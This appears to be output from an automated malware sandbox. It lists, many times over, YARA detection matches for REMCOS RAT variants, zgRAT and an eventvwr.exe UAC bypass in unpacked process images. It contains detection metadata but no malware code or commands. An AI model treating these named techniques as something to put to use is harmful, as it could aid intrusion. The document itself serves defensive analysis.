Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
